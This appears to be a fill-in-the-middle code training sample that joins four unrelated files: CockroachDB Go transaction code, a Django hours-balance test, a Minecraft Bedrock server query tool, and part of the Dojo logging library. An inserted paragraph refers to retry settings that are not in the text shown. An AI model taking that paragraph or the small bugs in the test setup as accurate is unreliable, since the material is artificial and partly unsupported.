SetUserPriority sets the transaction's user priority. Transactions default to // normal user priority. The user priority must be set before any operations are // performed on the transaction. func (txn *Txn) SetUserPriority(userPriority roachpb.UserPriority) error { if txn.retrying { if txn.UserPriority != userPriority { return util.Errorf("cannot change the user priority of a retrying transaction") } return nil } if txn.Proto.IsInitialized() { return util.Errorf("cannot change the user priority of a running transaction") } if userPriority < roachpb.MinUserPriority || userPriority > roachpb.MaxUserPriority { return util.Errorf("the given user priority %f is out of the allowed range [%f, %d]", userPriority, roachpb.MinUserPriority, roachpb.MaxUserPriority) } txn.UserPriority = userPriority return nil } // InternalSetPriority sets the transaction priority. It is intended for // internal (testing) use only. func (txn *Txn) InternalSetPriority(priority int32) { // The negative user priority is translated on the server into a positive, // non-randomized, priority for the transaction. txn.UserPriority = roachpb.UserPriority(-priority) } // SetSystemConfigTrigger sets the system db trigger to true on this transaction. // This will impact the EndTransactionRequest. func (txn *Txn) SetSystemConfigTrigger() { txn.systemConfigTrigger = true } // SystemConfigTrigger returns the systemConfigTrigger flag. func (txn *Txn) SystemConfigTrigger() bool { return txn.systemConfigTrigger } // NewBatch creates and returns a new empty batch object for use with the Txn. func (txn *Txn) NewBatch() *Batch { return &Batch{DB: &txn.db, txn: txn} } // Get retrieves the value for a key, returning the retrieved key/value or an // error. // // r, err := db.Get("a") // // string(r.Key) == "a" // // key can be either a byte slice or a string. 
func (txn *Txn) Get(key interface{}) (KeyValue, *roachpb.Error) { b := txn.NewBatch() b.Get(key) return runOneRow(txn, b) } // GetProto retrieves the value for a key and decodes the result as a proto // message. // // key can be either a byte slice or a string. func (txn *Txn) GetProto(key interface{}, msg proto.Message) *roachpb.Error { r, pErr := txn.Get(key) if pErr != nil { return pErr } return roachpb.NewError(r.ValueProto(msg)) } // Put sets the value for a key // // key can be either a byte slice or a string. value can be any key type, a // proto.Message or any Go primitive type (bool, int, etc). func (txn *Txn) Put(key, value interface{}) *roachpb.Error { b := txn.NewBatch() b.Put(key, value) _, pErr := runOneResult(txn, b) return pErr } // CPut conditionally sets the value for a key if the existing value is equal // to expValue. To conditionally set a value only if there is no existing entry // pass nil for expValue. Note that this must be an interface{}(nil), not a // typed nil value (e.g. []byte(nil)). // // key can be either a byte slice or a string. value can be any key type, a // proto.Message or any Go primitive type (bool, int, etc). func (txn *Txn) CPut(key, value, expValue interface{}) *roachpb.Error { b := txn.NewBatch() b.CPut(key, value, expValue) _, pErr := runOneResult(txn, b) return pErr } // Inc increments the integer value at key. If the key does not exist it will // be created with an initial value of 0 which will then be incremented. If the // key exists but was set using Put or CPut an error will be returned. // // The returned Result will contain a single row and Result.Err will indicate // success or failure. // // key can be either a byte slice or a string. func (txn *Txn) Inc(key interface{}, value int64) (KeyValue, *roachpb.Error) { b := txn.NewBatch() b.Inc(key, value) return runOneRow(txn, b) } func (txn *Txn) scan(begin, end interface{}, maxRows int64, isReverse bool) ([]KeyValue, *roachpb.Error) { b := txn.NewBatch() if !isReverse { b.Scan(begin, end, maxRows) } else { b.ReverseScan(begin, end, maxRows) } r, pErr := runOneResult(txn, b) return r.Rows, pErr } // Scan retrieves the rows between begin (inclusive) and end (exclusive) in // ascending order. // // The returned []KeyValue will contain up to maxRows elements. // // key can be either a byte slice or a string. func (txn *Txn) Scan(begin, end interface{}, maxRows int64) ([]KeyValue, *roachpb.Error) { return txn.scan(begin, end, maxRows, false) } // ReverseScan retrieves the rows between begin (inclusive) and end (exclusive) // in descending order. // // The returned []KeyValue will contain up to maxRows elements. // // key can be either a byte slice or a string. func (txn *Txn) ReverseScan(begin, end interface{}, maxRows int64) ([]KeyValue, *roachpb.Error) { return txn.scan(begin, end, maxRows, true) } // Del deletes one or more keys. // // key can be either a byte slice or a string. func (txn *Txn) Del(keys ...interface{}) *roachpb.Error { b := txn.NewBatch() b.Del(keys...) _, pErr := runOneResult(txn, b) return pErr } // DelRange deletes the rows between begin (inclusive) and end (exclusive). // // The returned Result will contain 0 rows and Result.Err will indicate success // or failure. // // key can be either a byte slice or a string. func (txn *Txn) DelRange(begin, end interface{}) *roachpb.Error { b := txn.NewBatch() b.DelRange(begin, end, false) _, pErr := runOneResult(txn, b) return pErr } // Run executes the operations queued up within a batch. 
Before executing any // of the operations the batch is first checked to see if there were any errors // during its construction (e.g. failure to marshal a proto message). // // The operations within a batch are run in parallel and the order is // non-deterministic. It is an unspecified behavior to modify and retrieve the // same key within a batch. // // Upon completion, Batch.Results will contain the results for each // operation. The order of the results matches the order the operations were // added to the batch. func (txn *Txn) Run(b *Batch) *roachpb.Error { _, pErr := txn.RunWithResponse(b) return pErr } // RunWithResponse is a version of Run that returns the BatchResponse. func (txn *Txn) RunWithResponse(b *Batch) (*roachpb.BatchResponse, *roachpb.Error) { tracing.AnnotateTrace() defer tracing.AnnotateTrace() if pErr := b.prepare(); pErr != nil { return nil, pErr } return sendAndFill(txn.send, b) } func (txn *Txn) commit(deadline *roachpb.Timestamp) *roachpb.Error { return txn.sendEndTxnReq(true /* commit */, deadline) } // CleanupOnError cleans up the transaction as a result of an error. func (txn *Txn) CleanupOnError(pErr *roachpb.Error) { if pErr == nil { panic("no error") } if replyErr := txn.Rollback(); replyErr != nil { log.Errorf("failure aborting transaction: %s; abort caused by: %s", replyErr, pErr) } } // CommitNoCleanup is the same as Commit but will not attempt to clean // up on failure. This can be used when the caller is prepared to do proper // cleanup. func (txn *Txn) CommitNoCleanup() *roachpb.Error { return txn.commit(nil) } // CommitInBatch executes the operations queued up within a batch and // commits the transaction. Explicitly committing a transaction is // optional, but more efficient than relying on the implicit commit // performed when the transaction function returns without error. // The batch must be created by this transaction. func (txn *Txn) CommitInBatch(b *Batch) *roachpb.Error { _, pErr := txn.CommitInBatchWithResponse(b) return pErr } // CommitInBatchWithResponse is a version of CommitInBatch that returns the // BatchResponse. func (txn *Txn) CommitInBatchWithResponse(b *Batch) (*roachpb.BatchResponse, *roachpb.Error) { if txn != b.txn { return nil, roachpb.NewErrorf("a batch b can only be committed by b.txn") } b.reqs = append(b.reqs, endTxnReq(true /* commit */, nil, txn.SystemConfigTrigger())) b.initResult(1, 0, nil) return txn.RunWithResponse(b) } // Commit sends an EndTransactionRequest with Commit=true. func (txn *Txn) Commit() *roachpb.Error { pErr := txn.commit(nil) if pErr != nil { txn.CleanupOnError(pErr) } return pErr } // CommitBy sends an EndTransactionRequest with Commit=true and // Deadline=deadline. func (txn *Txn) CommitBy(deadline roachpb.Timestamp) *roachpb.Error { pErr := txn.commit(&deadline) if pErr != nil { txn.CleanupOnError(pErr) } return pErr } // Rollback sends an EndTransactionRequest with Commit=false. 
func (txn *Txn) Rollback() *roachpb.Error { return txn.sendEndTxnReq(false /* commit */, nil) } func (txn *Txn) sendEndTxnReq(commit bool, deadline *roachpb.Timestamp) *roachpb.Error { _, pErr := txn.send(0, endTxnReq(commit, deadline, txn.SystemConfigTrigger())) return pErr } func endTxnReq(commit bool, deadline *roachpb.Timestamp, hasTrigger bool) roachpb.Request { req := &roachpb.EndTransactionRequest{ Commit: commit, Deadline: deadline, } if hasTrigger { req.InternalCommitTrigger = &roachpb.InternalCommitTrigger{ ModifiedSpanTrigger: &roachpb.ModifiedSpanTrigger{ SystemConfigSpan: true, }, } } return req } // TxnExecOptions controls how Exec() runs a transaction and the corresponding // closure. type TxnExecOptions struct { // If set, the transaction is automatically aborted if the closure returns any // error aside from recoverable internal errors, in which case the closure is // retried. The retryable function should have no side effects which could // cause problems in the event it must be run more than once. // If not set, all errors cause the txn to be aborted. AutoRetry bool // If set, then the txn is automatically committed if no errors are // encountered. If not set, committing or leaving open the txn is the // responsibility of the client. AutoCommit bool // Minimum initial timestamp, if so desired by a higher level (e.g. sql.Executor). MinInitialTimestamp roachpb.Timestamp } // Exec executes fn in the context of a distributed transaction. // Execution is controlled by opt (see comments in TxnExecOptions). // // opt is passed to fn, and it's valid for fn to modify opt as it sees // fit during each execution attempt. // // It's valid for txn to be nil (meaning the txn has already aborted) if fn // can handle that. This is useful for continuing transactions that have been // aborted because of an error in a previous batch of statements in the hope // that a ROLLBACK will reset the state. Neither opt.AutoRetry not opt.AutoCommit // can be set in this case. // // When this method returns, txn might be in any state; Exec does not attempt // to clean up the transaction before returning an error. In case of // TransactionAbortedError, txn is reset to a fresh transaction, ready to be // used. // // TODO(andrei): Make Exec() return error; make fn return an error + a retriable // bit. There's no reason to propagate roachpb.Error (protos) above this point. func (txn *Txn) Exec( opt TxnExecOptions, fn func(txn *Txn, opt *TxnExecOptions) *roachpb.Error) *roachpb.Error { // Run fn in a retry loop until we encounter a success or // error condition this loop isn't capable of handling. var pErr *roachpb.Error var retryOptions retry.Options if txn == nil && (opt.AutoRetry || opt.AutoCommit) { panic("asked to retry or commit a txn that is already aborted") } if txn != nil { // If we're looking at a brand new transaction, then communicate // what should be used as initial timestamp for the KV txn created // by TxnCoordSender. if txn.Proto.OrigTimestamp == roachpb.ZeroTimestamp { txn.Proto.OrigTimestamp = opt.MinInitialTimestamp } } if opt.AutoRetry { retryOptions = txn.db.txnRetryOptions } RetryLoop: for r := retry.Start(retryOptions); r.Next(); { pErr = fn(txn, &opt) if txn != nil { txn.retrying = true defer func() { txn.retrying = false }() } if (pErr == nil) && opt.AutoCommit && (txn.Proto.Status == roachpb.PENDING) { // fn succeeded, but didn't commit. 
pErr = txn.CommitNoCleanup() } if pErr == nil { break } // Make sure the txn record that pErr carries is for this txn.<|fim▁hole|> if pErr.GetTxn() != nil && txn.Proto.ID != nil { if errTxn := pErr.GetTxn(); !errTxn.Equal(&txn.Proto) { return roachpb.NewErrorf("mismatching transaction record in the error:\n%s\nv.s.\n%s", errTxn, txn.Proto) } } if !opt.AutoRetry { break RetryLoop } switch pErr.TransactionRestart { case roachpb.TransactionRestart_IMMEDIATE: r.Reset() case roachpb.TransactionRestart_BACKOFF: default: break RetryLoop } if log.V(2) { log.Infof("automatically retrying transaction: %s because of error: %s", txn.DebugName(), pErr) } } if pErr != nil { pErr.StripErrorTransaction() } return pErr } // send runs the specified calls synchronously in a single batch and // returns any errors. If the transaction is read-only or has already // been successfully committed or aborted, a potential trailing // EndTransaction call is silently dropped, allowing the caller to // always commit or clean-up explicitly even when that may not be // required (or even erroneous). func (txn *Txn) send(maxScanResults int64, reqs ...roachpb.Request) ( *roachpb.BatchResponse, *roachpb.Error) { if txn.Proto.Status != roachpb.PENDING { return nil, roachpb.NewErrorf("attempting to use %s transaction", txn.Proto.Status) } lastIndex := len(reqs) - 1 if lastIndex < 0 { return &roachpb.BatchResponse{}, nil } // firstWriteIndex is set to the index of the first command which is // a transactional write. If != -1, this indicates an intention to // write. This is in contrast to txn.Proto.Writing, which is set by // the coordinator when the first intent has been created, and which // lives for the life of the transaction. firstWriteIndex := -1 var firstWriteKey roachpb.Key for i, args := range reqs { if i < lastIndex { if _, ok := args.(*roachpb.EndTransactionRequest); ok { return nil, roachpb.NewErrorf("%s sent as non-terminal call", args.Method()) } } if roachpb.IsTransactionWrite(args) && firstWriteIndex == -1 { firstWriteKey = args.Header().Key firstWriteIndex = i } } haveTxnWrite := firstWriteIndex != -1 endTxnRequest, haveEndTxn := reqs[lastIndex].(*roachpb.EndTransactionRequest) needBeginTxn := !txn.Proto.Writing && haveTxnWrite needEndTxn := txn.Proto.Writing || haveTxnWrite elideEndTxn := haveEndTxn && !needEndTxn // If we're not yet writing in this txn, but intend to, insert a // begin transaction request before the first write command. if needBeginTxn { bt := &roachpb.BeginTransactionRequest{ Span: roachpb.Span{ Key: firstWriteKey, }, } reqs = append(append(append([]roachpb.Request(nil), reqs[:firstWriteIndex]...), bt), reqs[firstWriteIndex:]...) } if elideEndTxn { reqs = reqs[:lastIndex] } br, pErr := txn.db.send(maxScanResults, reqs...) if elideEndTxn && pErr == nil { // This normally happens on the server and sent back in response // headers, but this transaction was optimized away. The caller may // still inspect the transaction struct, so we manually update it // here to emulate a true transaction. if endTxnRequest.Commit { txn.Proto.Status = roachpb.COMMITTED } else { txn.Proto.Status = roachpb.ABORTED } } // If we inserted a begin transaction request, remove it here. if needBeginTxn { if br != nil && br.Responses != nil { br.Responses = append(br.Responses[:firstWriteIndex], br.Responses[firstWriteIndex+1:]...) } // Handle case where inserted begin txn confused an indexed error. 
if pErr != nil && pErr.Index != nil { idx := pErr.Index.Index if idx == int32(firstWriteIndex) { // An error was encountered on begin txn; disallow the indexing. pErr.Index = nil } else if idx > int32(firstWriteIndex) { // An error was encountered after begin txn; decrement index. pErr.SetErrorIndex(idx - 1) } } } return br, pErr }<|fim▁end|>
// We check only when txn.Proto.ID has been initialized after an initial successful send.
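
`DefaultTxnRetryOptions` near the top of this file (50 ms initial backoff, 5 s cap, multiplier 2) drive the `RetryLoop` in `Exec`. The schedule is plain capped exponential backoff; a sketch of the same policy, written in Python to match the other examples in this section, is below. The real `retry` package may also add jitter to each step, which is omitted here.

```python
# Capped exponential backoff as encoded by DefaultTxnRetryOptions.
def backoff_schedule(initial=0.050, maximum=5.0, multiplier=2.0, attempts=10):
    delay = initial
    for _ in range(attempts):
        yield delay
        delay = min(delay * multiplier, maximum)

# list(backoff_schedule())
# -> [0.05, 0.1, 0.2, 0.4, 0.8, 1.6, 3.2, 5.0, 5.0, 5.0]
```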
<|file_name|>test_hoursbalance_model.py<|end_file_name|><|fim▁begin|>import datetime import pytz from django.utils import timezone from django.contrib.auth.models import User from django.test import TestCase from gerencex.core.models import HoursBalance, Timing, Office from gerencex.core.time_calculations import DateData class HoursBalanceModelTest(TestCase): @classmethod def setUpTestData(cls): cls.user = User.objects.create_user('testuser', '[email protected]', 'senha123') def test_balances(self): r1 = HoursBalance.objects.create( date=datetime.date(2016, 8, 18), user=self.user, credit=datetime.timedelta(hours=6).seconds, debit=datetime.timedelta(hours=7).seconds, ) # Test creation self.assertTrue(HoursBalance.objects.exists()) # First balance is calculated without a previous balance (see the # total_balance_handler function at signals.py) self.assertEqual(r1.balance, int(datetime.timedelta(hours=-1).total_seconds())) # Second balance takes the first balance into account (see the # total_balance_handler function at signals.py) r2 = HoursBalance.objects.create( date=datetime.date(2016, 8, 19), user=self.user, credit=datetime.timedelta(hours=6).seconds, debit=datetime.timedelta(hours=7).seconds, ) self.assertEqual(r2.balance, int(datetime.timedelta(hours=-2).total_seconds())) # Change in first credit or debit must change the second balance (see the # next_balance_handler function at signals.py) r1.credit = datetime.timedelta(hours=7).seconds r1.save()<|fim▁hole|> self.assertEqual(r2.balance, int(datetime.timedelta(hours=-1).total_seconds())) class CreditTriggerTest(TestCase): """ The user credit is always registered at HourBalance via signal, when a checkout occurs. See the 'credit_calculation' function, at signals.py """ @classmethod def setUpTestData(cls): Office.objects.create(name='Nenhuma lotação', initials='NL', regular_work_hours=datetime.timedelta(hours=6)) User.objects.create_user('testuser', '[email protected]', 'senha123') cls.user = User.objects.get(username='testuser') def test_credit_triggers(self): # Let's record a check in... 
t1 = Timing.objects.create( user=self.user, date_time=timezone.make_aware(datetime.datetime(2016, 10, 3, 12, 0, 0, 0)), checkin=True ) # ...and a checkout t2 = Timing.objects.create( user=self.user, date_time=timezone.make_aware(datetime.datetime(2016, 10, 3, 13, 0, 0, 0)), checkin=False ) # Let's record a balance line at HoursBalance date = datetime.date(2016, 10, 3) new_credit = DateData(self.user, date).credit().seconds new_debit = DateData(self.user, date).debit().seconds HoursBalance.objects.create( date=date, user=self.user, credit=new_credit, debit=new_debit ) # Let's change t2 (checkout record) t2.date_time += datetime.timedelta(hours=1) t2.save() # The balance must have been recalculated via django signal (signals.py) checkout_tolerance = self.user.userdetail.office.checkout_tolerance checkin_tolerance = self.user.userdetail.office.checkin_tolerance tolerance = checkout_tolerance + checkin_tolerance reference = datetime.timedelta(hours=2).seconds + tolerance.seconds line = HoursBalance.objects.first() credit = line.credit self.assertEqual(reference, credit) # Let's change t1 (checkin record) t1.date_time += datetime.timedelta(hours=1) t1.save() # The balance must have been recalculated via signal modified_reference = datetime.timedelta(hours=1).seconds + tolerance.seconds modified_balance_line = HoursBalance.objects.first() modified_credit = modified_balance_line.credit self.assertEqual(modified_reference, modified_credit) # TODO: Escrever o teste depois que já houver view para produzir o balanço da divisão e do usuário class RestdayDebitTriggerTest(TestCase): """ When a we record a Restday whose date is prior to the date of the Balance, the balances must be recalculated for all users. """ @classmethod def setUpTestData(cls): Office.objects.create(name='Diacomp 1', initials='diacomp1') Office.objects.create(name='Diacomp 2', initials='diacomp2') cls.diacomp1 = Office.objects.get(initials='diacomp1') cls.diacomp2 = Office.objects.get(initials='diacomp2') cls.diacomp1.hours_control_start_date = datetime.date(2016, 9, 1) cls.diacomp1.save() cls.diacomp2.hours_control_start_date = datetime.date(2016, 10, 1) cls.diacomp1.save() User.objects.create_user('testuser1', '[email protected]', 'senha123') User.objects.create_user('testuser2', '[email protected]', 'senha123') cls.user1 = User.objects.get(username='testuser') cls.user2 = User.objects.get(username='testuser') # def test_debit_trigger(self): def activate_timezone(): return timezone.activate(pytz.timezone('America/Sao_Paulo'))<|fim▁end|>
r2 = HoursBalance.objects.get(pk=2)
<|file_name|>query.py<|end_file_name|><|fim▁begin|># # Copyright (c) 2017-2021 w-gao # import argparse import logging import struct import sys import socket from contextlib import contextmanager from random import randint from typing import Generator logger = logging.getLogger(__name__) logging.basicConfig(level=logging.WARNING) # constants MC_QUERY_MAGIC = b'\xFE\xFD' MC_QUERY_HANDSHAKE = b'\x09' MC_QUERY_STATISTICS = b'\x00' class QueryNetworkError(Exception): """ Exception thrown when the socket connection fails. """ pass class QueryFormatError(Exception): """ Exception thrown when the data returned from the server is malformed. """ def __init__(self, raw_data=None): if raw_data: msg = f"Error parsing data: '{raw_data}'. Format has likely changed." else: msg = "Error parsing data from the target server. Format has likely changed." super(QueryFormatError, self).__init__(msg) class QueryServerData: """ An object encapsulating the data retrieved from a target Minecraft: Bedrock edition server using the Query protocol. Note that not all servers provide complete or accurate information, so any field could be empty. """ def __init__(self): self.motd = None self.hostname = None self.game_type = None self.game_id = None self.version = None self.server_engine = None self.plugins = [] self.map = None self.num_players = -1 self.max_players = -1<|fim▁hole|> self.host_ip = None self.host_port = None self.players = [] def __str__(self): return "{}({})".format(self.__class__.__name__, ', '.join(f"{k}={repr(v)}" for k, v in self.__dict__.items())) @contextmanager def mcquery(host: str, port: int = 19132, timeout: int = 5) -> Generator[QueryServerData, None, None]: """ A context manager to make a socket connection to the target host and port, then initiates the query protocol sequence to request information about the server. The socket connection is automatically closed when the context manager exits. """ soc = None try: logger.debug(f"Connecting to {host}:{port}...") soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) soc.settimeout(timeout) soc.connect((host, port)) # Magic + packetType + sessionId + payload handshake = MC_QUERY_MAGIC + MC_QUERY_HANDSHAKE + struct.pack('>l', randint(1, 9999999)) logger.debug("Sending handshake...") soc.send(handshake) token = soc.recv(65535)[5:-1].decode() if token is not None: payload = b'\x00\x00\x00\x00' logger.debug("Requesting statistics...") request_stat = MC_QUERY_MAGIC + MC_QUERY_STATISTICS + struct.pack('>l', randint(1, 9999999)) + struct.pack( '>l', int(token)) + payload soc.send(request_stat) buff = str(soc.recv(65535)[5:]) if buff is not None: logger.debug("Got data from server.") logger.debug("Parsing data...") yield _parse_data(buff) return raise QueryFormatError except socket.error as msg: raise QueryNetworkError(f"Failed to query: '{msg}'") finally: logger.debug("Closing connection...") soc.close() def _parse_data(raw_data: str) -> QueryServerData: """ Internal function for parsing the raw data from the target server into a QueryServerData object. 
""" stats = QueryServerData() server_data = raw_data.split(r'\x01') if len(server_data) != 2: raise QueryFormatError(raw_data) server_data_1 = server_data[0].split(r'\x00')[2:-2] server_data_2 = server_data[1].split(r'\x00')[2:-2] # player list # trimmed server data data = {} for i in range(0, len(server_data_1), 2): data[server_data_1[i]] = server_data_1[i + 1] stats.hostname = data.get('hostname') stats.game_type = data.get('gametype') stats.game_id = data.get('game_id') stats.version = data.get('version') stats.server_engine = data.get('server_engine') # plugins plugins = [] for p in data.get('plugins', '').split(';'): plugins.append(p) stats.plugins = plugins stats.map = data.get('map') stats.num_players = int(data.get('numplayers', -1)) stats.max_players = int(data.get('maxplayers', -1)) stats.whitelist = data.get('whitelist') stats.host_ip = data.get('hostip') stats.host_port = int(data.get('hostport', -1)) players = [] for p in server_data_2: players.append(p) stats.players = players return stats def main(args=None): parser = argparse.ArgumentParser(description="Query tool for Minecraft: Bedrock Edition servers.") parser.add_argument("host", type=str, help="The host of the server.") parser.add_argument("-p", "--port", type=int, default=19132, help="The port of the server.") parser.add_argument("-t", "--timeout", type=int, default=5, help="The time limit of the socket connection.") parser.add_argument("-d", "--debug", action='store_true', help="Enable debug logging.") options = parser.parse_args(args) if options.debug: logging.basicConfig(level=logging.DEBUG) host = options.host port = options.port timeout = options.timeout try: with mcquery(host, port=port, timeout=timeout) as data: def key(k): return k.capitalize().replace('_', ' ') stdout: str = '\n'.join(f"{key(k)}: {v}" for k, v in data.__dict__.items()) print(stdout) except Exception as e: print(f"An error occurred during query: {e}") if __name__ == "__main__": main(sys.argv[1:])<|fim▁end|>
self.whitelist = None
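A minimal usage sketch for the mcquery() context manager defined in the query.py record above; it assumes the module is importable as `query`, and the host name is a placeholder, not taken from the original file.

# Minimal usage sketch (assumes the module above is importable as `query`).
# "play.example.com" is a placeholder host, not part of the original file.
from query import mcquery, QueryNetworkError, QueryFormatError

def print_summary(host: str, port: int = 19132) -> None:
    try:
        with mcquery(host, port=port, timeout=5) as data:
            # Any field may be None or -1 if the server omits it.
            print(f"{data.hostname}: {data.num_players}/{data.max_players} players")
    except (QueryNetworkError, QueryFormatError) as err:
        print(f"Query failed: {err}")

print_summary("play.example.com")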
<|file_name|>Logger.js<|end_file_name|><|fim▁begin|>/* Copyright (c) 2004-2006, The Dojo Foundation All Rights Reserved. Licensed under the Academic Free License version 2.1 or above OR the modified BSD license. For more information on Dojo licensing, see: http://dojotoolkit.org/community/licensing.shtml */ dojo.provide("dojo.logging.Logger"); dojo.provide("dojo.logging.LogFilter"); dojo.provide("dojo.logging.Record"); dojo.provide("dojo.log"); dojo.require("dojo.lang.common"); dojo.require("dojo.lang.declare"); /* This is the dojo logging facility, which is imported from nWidgets (written by Alex Russell, CLA on file), which is patterned on the Python logging module, which in turn has been heavily influenced by log4j (execpt with some more pythonic choices, which we adopt as well). While the dojo logging facilities do provide a set of familiar interfaces, many of the details are changed to reflect the constraints of the browser environment. Mainly, file and syslog-style logging facilites are not provided, with HTTP POST and GET requests being the only ways of getting data from the browser back to a server. Minimal support for this (and XML serialization of logs) is provided, but may not be of practical use in a deployment environment. The Dojo logging classes are agnostic of any environment, and while default loggers are provided for browser-based interpreter environments, this file and the classes it define are explicitly designed to be portable to command-line interpreters and other ECMA-262v3 envrionments. the logger needs to accomidate: log "levels" type identifiers file? message tic/toc? The logger should ALWAYS record: time/date logged message type level */ // TODO: define DTD for XML-formatted log messages // TODO: write XML Formatter class // TODO: write HTTP Handler which uses POST to send log lines/sections dojo.logging.Record = function(/*Integer*/logLevel, /*String||Array*/message){ // summary: <|fim▁hole|> // an event is logged and are the internal format in which information // about log events is kept. // logLevel: // Integer mapped via the dojo.logging.log.levels object from a // string. This mapping also corresponds to an instance of // dojo.logging.Logger // message: // The contents of the message represented by this log record. this.level = logLevel; this.message = ""; this.msgArgs = []; this.time = new Date(); if(dojo.lang.isArray(message)){ if(message.length > 0 && dojo.lang.isString(message[0])){ this.message=message.shift(); } this.msgArgs = message; }else{ this.message = message; } // FIXME: what other information can we receive/discover here? } dojo.logging.LogFilter = function(loggerChain){ // summary: // An empty parent (abstract) class which concrete filters should // inherit from. Filters should have only a single method, filter(), // which processes a record and returns true or false to denote // whether or not it should be handled by the next step in a filter // chain. 
this.passChain = loggerChain || ""; this.filter = function(record){ // FIXME: need to figure out a way to enforce the loggerChain // restriction return true; // pass all records } } dojo.logging.Logger = function(){ this.cutOffLevel = 0; this.propagate = true; this.parent = null; // storage for dojo.logging.Record objects seen and accepted by this logger this.data = []; this.filters = []; this.handlers = []; } dojo.extend(dojo.logging.Logger,{ _argsToArr: function(args){ var ret = []; for(var x=0; x<args.length; x++){ ret.push(args[x]); } return ret; }, setLevel: function(/*Integer*/lvl){ // summary: // set the logging level for this logger. // lvl: // the logging level to set the cutoff for, as derived from the // dojo.logging.log.levels object. Any messages below the // specified level are dropped on the floor this.cutOffLevel = parseInt(lvl); }, isEnabledFor: function(/*Integer*/lvl){ // summary: // will a message at the specified level be emitted? return parseInt(lvl) >= this.cutOffLevel; // boolean }, getEffectiveLevel: function(){ // summary: // gets the effective cutoff level, including that of any // potential parent loggers in the chain. if((this.cutOffLevel==0)&&(this.parent)){ return this.parent.getEffectiveLevel(); // Integer } return this.cutOffLevel; // Integer }, addFilter: function(/*dojo.logging.LogFilter*/flt){ // summary: // registers a new LogFilter object. All records will be passed // through this filter from now on. this.filters.push(flt); return this.filters.length-1; // Integer }, removeFilterByIndex: function(/*Integer*/fltIndex){ // summary: // removes the filter at the specified index from the filter // chain. Returns whether or not removal was successful. if(this.filters[fltIndex]){ delete this.filters[fltIndex]; return true; // boolean } return false; // boolean }, removeFilter: function(/*dojo.logging.LogFilter*/fltRef){ // summary: // removes the passed LogFilter. Returns whether or not removal // was successful. for(var x=0; x<this.filters.length; x++){ if(this.filters[x]===fltRef){ delete this.filters[x]; return true; } } return false; }, removeAllFilters: function(){ // summary: clobbers all the registered filters. this.filters = []; // clobber all of them }, filter: function(/*dojo.logging.Record*/rec){ // summary: // runs the passed Record through the chain of registered filters. // Returns a boolean indicating whether or not the Record should // be emitted. for(var x=0; x<this.filters.length; x++){ if((this.filters[x]["filter"])&& (!this.filters[x].filter(rec))|| (rec.level<this.cutOffLevel)){ return false; // boolean } } return true; // boolean }, addHandler: function(/*dojo.logging.LogHandler*/hdlr){ // summary: adds as LogHandler to the chain this.handlers.push(hdlr); return this.handlers.length-1; }, handle: function(/*dojo.logging.Record*/rec){ // summary: // if the Record survives filtering, pass it down to the // registered handlers. Returns a boolean indicating whether or // not the record was successfully handled. If the message is // culled for some reason, returns false. if((!this.filter(rec))||(rec.level<this.cutOffLevel)){ return false; } // boolean for(var x=0; x<this.handlers.length; x++){ if(this.handlers[x]["handle"]){ this.handlers[x].handle(rec); } } // FIXME: not sure what to do about records to be propagated that may have // been modified by the handlers or the filters at this logger. Should // parents always have pristine copies? or is passing the modified record // OK? 
// if((this.propagate)&&(this.parent)){ this.parent.handle(rec); } return true; // boolean }, // the heart and soul of the logging system log: function(/*integer*/lvl, /*string*/msg){ // summary: // log a message at the specified log level if( (this.propagate)&&(this.parent)&& (this.parent.rec.level>=this.cutOffLevel)){ this.parent.log(lvl, msg); return false; } // FIXME: need to call logging providers here! this.handle(new dojo.logging.Record(lvl, msg)); return true; }, // logger helpers debug:function(/*string*/msg){ // summary: // log the msg and any other arguments at the "debug" logging // level. return this.logType("DEBUG", this._argsToArr(arguments)); }, info: function(msg){ // summary: // log the msg and any other arguments at the "info" logging // level. return this.logType("INFO", this._argsToArr(arguments)); }, warning: function(msg){ // summary: // log the msg and any other arguments at the "warning" logging // level. return this.logType("WARNING", this._argsToArr(arguments)); }, error: function(msg){ // summary: // log the msg and any other arguments at the "error" logging // level. return this.logType("ERROR", this._argsToArr(arguments)); }, critical: function(msg){ // summary: // log the msg and any other arguments at the "critical" logging // level. return this.logType("CRITICAL", this._argsToArr(arguments)); }, exception: function(/*string*/msg, /*Error*/e, /*boolean*/squelch){ // summary: // logs the error and the message at the "exception" logging // level. If squelch is true, also prevent bubbling of the // exception. // FIXME: this needs to be modified to put the exception in the msg // if we're on Moz, we can get the following from the exception object: // lineNumber // message // fileName // stack // name // on IE, we get: // name // message (from MDA?) // number // description (same as message!) if(e){ var eparts = [e.name, (e.description||e.message)]; if(e.fileName){ eparts.push(e.fileName); eparts.push("line "+e.lineNumber); // eparts.push(e.stack); } msg += " "+eparts.join(" : "); } this.logType("ERROR", msg); if(!squelch){ throw e; } }, logType: function(/*string*/type, /*array*/args){ // summary: // a more "user friendly" version of the log() function. Takes the // named log level instead of the corresponding integer. return this.log.apply(this, [dojo.logging.log.getLevel(type), args]); }, warn:function(){ // summary: shorthand for warning() this.warning.apply(this,arguments); }, err:function(){ // summary: shorthand for error() this.error.apply(this,arguments); }, crit:function(){ // summary: shorthand for critical() this.critical.apply(this,arguments); } }); // the Handler class dojo.logging.LogHandler = function(level){ this.cutOffLevel = (level) ? level : 0; this.formatter = null; // FIXME: default formatter? this.data = []; this.filters = []; } dojo.lang.extend(dojo.logging.LogHandler,{ setFormatter:function(formatter){ dojo.unimplemented("setFormatter"); }, flush:function(){ // summary: // Unimplemented. Should be implemented by subclasses to handle // finishing a transaction or otherwise comitting pending log // messages to whatevery underlying transport or storage system is // available. }, close:function(){ // summary: // Unimplemented. Should be implemented by subclasses to handle // shutting down the logger, including a call to flush() }, handleError:function(){ // summary: // Unimplemented. Should be implemented by subclasses. 
dojo.deprecated("dojo.logging.LogHandler.handleError", "use handle()", "0.6");
	},

	handle:function(/*dojo.logging.Record*/record){
		// summary:
		//		Emits the record object passed in should the record meet the
		//		current logging level cutoff, as specified in cutOffLevel.
		if((this.filter(record))&&(record.level>=this.cutOffLevel)){
			this.emit(record);
		}
	},

	emit:function(/*dojo.logging.Record*/record){
		// summary:
		//		Unimplemented. Should be implemented by subclasses to handle
		//		an individual record. Subclasses may batch records and send
		//		them to their "substrate" only when flush() is called, but this
		//		is generally not a good idea as losing logging messages may
		//		make debugging significantly more difficult. Tuning the volume
		//		of logging messages written to storage should be accomplished
		//		with log levels instead.
		dojo.unimplemented("emit");
	}
});

// set aliases since we don't want to inherit from dojo.logging.Logger
void(function(){ // begin globals protection closure
	var names = [
		"setLevel", "addFilter", "removeFilterByIndex", "removeFilter",
		"removeAllFilters", "filter"
	];
